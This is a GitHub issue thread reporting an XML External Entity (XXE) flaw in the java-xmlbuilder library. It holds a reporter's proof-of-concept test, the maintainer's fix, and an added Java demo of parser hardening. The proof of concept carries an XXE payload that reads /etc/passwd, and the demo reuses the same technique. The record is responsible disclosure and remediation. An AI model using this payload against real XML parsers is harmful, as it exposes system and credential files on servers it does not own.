XMLBuilder2 is vulnerable to XML External Entity (XXE) injection #6

Closed
xiaoyongwu opened this issue Jul 22, 2014 · 1 comment

Comments

@xiaoyongwu

I noticed that by default, the parser in XMLBuilder is vulnerable to XXE.
The following PoC is a modified version of the TestXMLBuilder2.java file that would see the local file included in parser output.

package com.jamesmurty.utils;

import javax.xml.xpath.XPathConstants;
import javax.xml.xpath.XPathExpressionException;

public class TestXMLBuilder2 extends BaseXMLBuilderTests {

    // PoC document: a DOCTYPE that declares an external general entity
    // pointing at a local file, referenced once from the document body.
    public static final String EXAMPLE_XML_DOC2 =
        "<?xml version=\"1.0\"?>"
        + "<!DOCTYPE Projects [ <!ELEMENT JetS3t ANY> "
        + "<!ENTITY xx1 SYSTEM \"file:///etc/passwd\"> ]>"
        + EXAMPLE_XML_DOC_START + "&xx1;" + EXAMPLE_XML_DOC_END;

    @Override
    public Class<? extends BaseXMLBuilder> XMLBuilderToTest() throws Exception {
        return XMLBuilder2.class;
    }

    @Override
    protected boolean isRuntimeExceptionsOnly() {
        return true;
    }

    // NOTE: No checked exceptions for API calls made in this test method
    public void testNoCheckedExceptions() {
        XMLBuilder2 builder = XMLBuilder2.create("Blah");
        // Parsing with the default settings resolves &xx1; and pulls the
        // contents of /etc/passwd into the document.
        builder = XMLBuilder2.parse(EXAMPLE_XML_DOC2);
        builder.stripWhitespaceOnlyTextNodes();
        builder.asString();
        builder.elementAsString();
        builder.xpathQuery("/*", XPathConstants.NODESET);
        builder = builder.xpathFind("/Projects");
        // Prints the text of the root element, i.e. the file contents.
        System.out.println(builder.getElement().getTextContent());
    }

    public void testExceptionWrappedInXMLBuilderRuntimeException() {
        XMLBuilder2 builder = XMLBuilder2.parse(EXAMPLE_XML_DOC2);
        try {
            builder.xpathFind("/BadPath");
            fail("Expected XMLBuilderRuntimeException");
        } catch (XMLBuilderRuntimeException e) {
            assertEquals(XMLBuilderRuntimeException.class, e.getClass());
            Throwable cause = e.getCause();
            assertEquals(XPathExpressionException.class, cause.getClass());
            assertTrue(cause.getMessage().contains("does not resolve to an Element"));
        }
    }

}

jmurty added a commit that referenced this issue Jul 22, 2014
…, re #6

XML Builder classes now explicitly enable or disable
'external-general-entities' and 'external-parameter-entities' features
of the DocumentBuilderFactory when #create or #parse methods are used.

To prevent XML External Entity (XXE) injection attacks, these features
are disabled by default. They can only be enabled by passing a true
boolean value to new versions of the #create and #parse methods that
accept a flag for this feature.
@jmurty
Owner

jmurty commented Jul 22, 2014

@xiaoyongwu Thanks for the report. This XXE vulnerability is now fixed by disabling external entity processing by default; external entities are now only processed if this feature is explicitly enabled in a call to the #create or #parse methods.
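The following is an added example, not code from this thread or from the java-xmlbuilder project. It uses the JDK's own DocumentBuilderFactory to show what the fix commit describes: the same kind of payload as the PoC above is parsed once with a stock factory, once with the 'external-general-entities' and 'external-parameter-entities' features switched off, and once with DOCTYPE declarations rejected outright. The class name XxeDemo, the temporary file standing in for /etc/passwd, and the SECRET-TOKEN marker are all constructed for the demo; the entity name xx1 and the Projects root element are reused from the PoC.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.SAXParseException;

// Added example (not the java-xmlbuilder project's code). Demonstrates the
// effect of the two SAX features named in the fix commit on a DocumentBuilderFactory,
// plus the stricter DOCTYPE ban. File name and marker string are constructed here.
public class XxeDemo {

    static final String EXTERNAL_GENERAL_ENTITIES =
        "http://xml.org/sax/features/external-general-entities";
    static final String EXTERNAL_PARAMETER_ENTITIES =
        "http://xml.org/sax/features/external-parameter-entities";
    static final String DISALLOW_DOCTYPE =
        "http://apache.org/xml/features/disallow-doctype-decl";

    /** Stock factory: with default JAXP settings SYSTEM entities are fetched and inlined. */
    static DocumentBuilderFactory permissiveFactory() {
        return DocumentBuilderFactory.newInstance();
    }

    /** Mirrors the fix: external entities are never fetched; a DOCTYPE is still accepted. */
    static DocumentBuilderFactory noExternalEntitiesFactory() throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature(EXTERNAL_GENERAL_ENTITIES, false);
        f.setFeature(EXTERNAL_PARAMETER_ENTITIES, false);
        f.setXIncludeAware(false);              // belt and braces: no XInclude fetches either
        return f;
    }

    /** Strictest option: any DOCTYPE is rejected, which also stops internal-entity expansion bombs. */
    static DocumentBuilderFactory noDoctypeFactory() throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature(DISALLOW_DOCTYPE, true);
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true); // JDK entity-expansion limits
        return f;
    }

    /** Parses xml with the given factory and returns the root element's text. */
    static String parseTextContent(DocumentBuilderFactory f, String xml) throws Exception {
        DocumentBuilder b = f.newDocumentBuilder();
        Document doc = b.parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
        return doc.getDocumentElement().getTextContent();
    }

    public static void main(String[] args) throws Exception {
        // Constructed stand-in for /etc/passwd so the demo runs on any OS.
        Path secret = Files.createTempFile("xxe-demo", ".txt");
        Files.write(secret, "SECRET-TOKEN".getBytes(StandardCharsets.UTF_8));
        String payload = "<?xml version=\"1.0\"?>"
            + "<!DOCTYPE Projects [ <!ENTITY xx1 SYSTEM \"" + secret.toUri() + "\"> ]>"
            + "<Projects>&xx1;</Projects>";

        // 1. Default factory: the file contents appear in the parsed document.
        String leaked = parseTextContent(permissiveFactory(), payload);
        System.out.println("default factory    : " + leaked);

        // 2. External entities disabled: the reference resolves to nothing.
        String blocked = parseTextContent(noExternalEntitiesFactory(), payload);
        System.out.println("entities disabled  : '" + blocked + "'");
        if (blocked.contains("SECRET-TOKEN")) {
            throw new AssertionError("external entity was still resolved");
        }

        // 3. DOCTYPE disallowed: the parser refuses the document before any entity is seen.
        try {
            parseTextContent(noDoctypeFactory(), payload);
            throw new AssertionError("DOCTYPE should have been rejected");
        } catch (SAXParseException e) {
            System.out.println("doctype disallowed : " + e.getMessage());
        }
        Files.deleteIfExists(secret);
    }
}
```

Compile and run with `javac XxeDemo.java && java XxeDemo`. Turning off the two external-entity features is the minimal change and is what the commit describes; it stops file disclosure and outbound requests through SYSTEM identifiers while still accepting documents that carry a DOCTYPE. It does not by itself stop purely internal entity expansion ("billion laughs"), which is why the disallow-doctype-decl variant is the usual recommendation for parsers that never need a DTD at all.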
